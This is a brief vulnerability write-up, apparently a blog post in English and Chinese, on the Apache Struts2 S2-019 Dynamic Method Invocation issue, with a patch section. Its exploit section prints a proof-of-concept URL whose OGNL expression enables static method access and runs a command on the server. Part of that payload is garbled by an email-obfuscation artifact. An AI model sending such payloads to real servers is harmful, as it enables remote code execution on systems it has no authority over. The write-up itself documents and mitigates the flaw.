catalog
1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix
1. Description
Dynamic Method Invocation is a mechanism known to impose possible security vulnerabilities, but until now it was enabled by default with warning that users should switch it off if possible.
Relevant Link:
http://struts.apache.org/docs/s2-019.html?spm=5176.775974950.2.8.iJuruO
2. Effected Scope
3. Exploit Analysis
0x1: POC
需要目标struts2应用开启debug模式
http://localhost:8080/crazyit/register.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField %28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29, @[email protected]%28%29.exec%28%27/Applications/Calculator.app/Contents/MacOS/Calculator%27%29 /* http://localhost:8080/crazyit/register.action?debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField (‘allowStaticMethodAccess‘),#f.setAccessible(true),#f.set(#_memberAccess,true), @[email protected]().exec(‘/Applications/Calculator.app/Contents/MacOS/Calculator‘) */
Relevant Link:
http://qqhack8.blog.163.com/blog/static/114147985201463194423958/ http://qqhack8.blog.163.com/blog/static/114147985201402743220859
4. Principle Of Vulnerability
5. Patch Fix
0x1: upgrade struts2
In Struts 2.3.15.2 the Dynamic Method Invocation is to false by default. Another option is to set struts.enable.DynamicMethodInvocation to false in struts.xml
<constant name="struts.enable.DynamicMethodInvocation" value="false"/>
0x2: 手动修复方法
1. 使用过滤器对相关关键字进行拦截,需要修改struts.xml,并重启struts2应用进程 2. 动态关闭struts2的属性开关(hotfix) 3. 使用waf进行URL层面的拦截
Relevant Link:
http://www.fjssc.cn/html/research/notice/2014/0127/78.html
Copyright (c) 2015 Little5ann All rights reserved
时间: 2024-10-29 19:06:40